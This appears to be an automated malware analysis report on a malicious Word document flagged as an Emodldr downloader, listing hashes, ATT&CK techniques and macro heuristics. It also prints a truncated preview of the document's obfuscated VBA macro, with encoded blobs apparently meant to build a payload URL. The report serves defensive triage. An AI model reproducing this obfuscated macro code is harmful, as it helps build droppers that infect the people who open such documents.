Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b964eb36b94ac927…

MALICIOUS

Office (OLE)

Size: 174.5 KB
Created: 2018-03-28 14:52:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: df651bfd0205a7accbb172e6f4c2dcf8
SHA-1: a465adc7a1660b5f6e9997b8a0093d99f245d5ec
SHA-256: b964eb36b94ac927f8e16648faaabd7fd717382de222901ee98184e0e63309cd
Risk Score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including AutoOpen and CreateObject calls. The VBA script contains obfuscated strings that are likely used to construct a URL for downloading a second-stage payload, a common technique for Emodldr malware. The presence of legacy WordBasic and Excel 4.0 macros further indicates malicious intent.

Heuristics (9)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected (severity: medium, 3 related findings, id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (severity: high, id: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high, id: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium, id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present (severity: medium, id: OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact (severity: info, id: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 53200 bytes
SHA-256: 13452ab03e090249c479975651353498ddd047a1deb030678bc2d382a08cb6eb
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 26 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "JwXSvTu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XQwovwB"
Function WCJokJLHLjwV()
On Error Resume Next
Select Case CWFzpr
      Case 91550
         EJphV = CStr(zviLP + CStr(93159) - lvpFhQ * 74305)
      Case 47725
         uUJGDZ = QZQZvZ
         qiwFBc = Tan(4272 * YzIQa)
End Select
FbwYlRAYm = XkkNM("5t3ADQAOAAxADYAMwBkADcAZQBjADIAMAAwAGMANwA2AGIAYQBiADAANQBkADcAYwBiADMAMQA1ADMAOAA5ADUANQA0AGQAZQBhADEAZQBiADcAOQBmAGEANgA1ADkAYgBhADAAZAA2AGUAYgAwAGMAMgBiAGYAYwBiADMAMwA2AGUAZgA3ADEANgBkADWt7TQj", 4, 186)
Select Case uIbIk
      Case 40927
         UXPwZ = CStr(OlwWp + CStr(23016) - zalLlv * 63884)
      Case 68390
         LwnwfW = pQKEi
         HhGbc = Tan(77244 * ZbTEd)
End Select
Select Case XnJIMw
      Case 11309
         QqkFb = CStr(bOiBV + CStr(62110) - ViRuAI * 60479)
      Case 68519
         jGBIc = CFIwPv
         vtAfl = Tan(95701 * iGVjh)
End Select
ijPwXlilt = XkkNM("caMABlAGQAMAA0ADYAYQA1AGEAZQAyADgAZAAwADIAYQBlAGYAOAA0ADYAYgAwADgAMgAyAGQAMQBlAGIAOABhADkAOQAzADMAZQA4ADUAZABlADkANwBjADEANQBlAGEANAA3ADkANwAzADMAYgOt3DK", 3, 146)
Select Case JrOLo
      Case 50829
         IJiDS = CStr(wMZsWQ + CStr(3868) - iYtVX * 64778)
      Case 30836
         ZlVab = KqzKp
         BlPwM = Tan(20013 * HJNwQ)
End Select
Select Case NoTiH
      Case 86635
         nipBFD = CStr(tBQrFP + CStr(62073) - aokXuc * 30668)
      Case 69707
         ztuNd = KvmjX
         qCGtii = Tan(10008 * GHRfQ)
End Select
TdXkORCJ = XkkNM("HcAMQAyADEAZAAwAGUAZgAxADgAMQA2ADIAYwA0ADcAMwBhADcAMABhAGEAYgAwAGEAMwAxADQAOAAyADgANABkAGQANAA3AGEAMQA0AGQAMQAwAGYANQA2ADAAMAA1ADAANQAzAGIAZQAyADIANQA5AGIAOQA3AGYANQAyADkAZAAzADYAMwAxADkAZAA0ADYAN%aKl", 3, 194)
Select Case fukwS
      Case 44518
         TDMJZQ = CStr(GvSfIH + CStr(69578) - ddMzKW * 31496)
      Case 81277
         OzPmPK = RArXzu
         IOWHKo = Tan(74787 * JdtRG)
End Select
Select Case wjrPf
      Case 90426
         lPqWM = CStr(CYaOo + CStr(82946) - VYsjKs * 85238)
      Case 48583
         JJIPI = PUjVt
         RcqECF = Tan(96634 * ZLPhW)
End Select
jJRTmlPW = XkkNM("u5HGIAYwBlAGYAZAAyAGQAMQA3ADMAYgAwAGEAYQA3ADEAZgAxADQAMgBhADIAZABiAGYAOABlAGEANQBhADkAYwBmAGYAMgA1ADQAMwBiAGIAMQBmADEANAA3ADUAZQAxADkANAAwAGEAMgA2ADkANQBkADQAZQBkADkAMtHbA5", 4, 164)
Select Case aoHEnC
      Case 91710
         GhNzHo = CStr(FhSzE + CStr(7730) - BiHnuF * 64794)
      Case 95833
         asPoaN = iqwnWJ
         EzKKTd = Tan(92981 * Rpfmcz)
End Select
Select Case jDkZR
      Case 74569
         mNOADt = CStr(kWJNIX + CStr(64827) - TmSjS * 96286)
      Case 15579
         MztYF = awdvtC
         QRoAMp = Tan(63312 * lQoob)
End Select
LGaAtYwhV = XkkNM("BSd1AYwA2AGQAMgA0AGQAOQBmADQAMgAyAGQAYgA1ADMAMwBkADUAMAA1ADYAYQA4ADQANwA2ADUAYwBmAGUAYgA5ADQAMgA1AGUAZABhADgAMQBjADQAYwA2AGIAMAA5ADEAMwBkADcANQBhADv,i3", 5, 143)
Select Case wHiTzi
      Case 18129
         BJVqu = CStr(KjMifa + CStr(6688) - iiGIb * 79798)
      Case 53399
         FjdGcr = cwXYOQ
         fVvkEB = Tan(8684 * IAjdc)
End Select
Select Case wBHZKb
      Case 8617
         AOKTZ = CStr(ibnwli + CStr(14808) - oITiZ * 89169)
      Case 93464
         RwBOzp = DlBYn
         liolDi = Tan(87447 * vkvfc)
End Select
SWhSrGiV = XkkNM("kn810AGUAYgA0AGIANwBiADUAZgAAs", 5, 23)
Select Case wFbBK
      Case 55109
         zMSLj = CStr(KkNjGU + CStr(75703) - ifzWP * 6023)
      Case 33162
         NFiXc = zKAOK
         nSVaW = Tan(73012 * fiApLp)
End Select
Select Case JCsAY
      Case 75377
         ctHvT = CStr(QXqFY + CStr(82845) - fzZhL * 87317)
      Case 72361
         wbICX = HsPQir
         dXfqd = Tan(67750 * ZCLwX)
End Select
FmOmZifaZO = XkkNM("CCdABlADYANQA2AGQAMgAzADQANgBiAGIAMQXFq%b", 4, 33)
Select Case rMcKp
      Case 60599
         jdRzs = CStr(qJfaop + CStr(99938) - CatrhK * 51616)

... (truncated)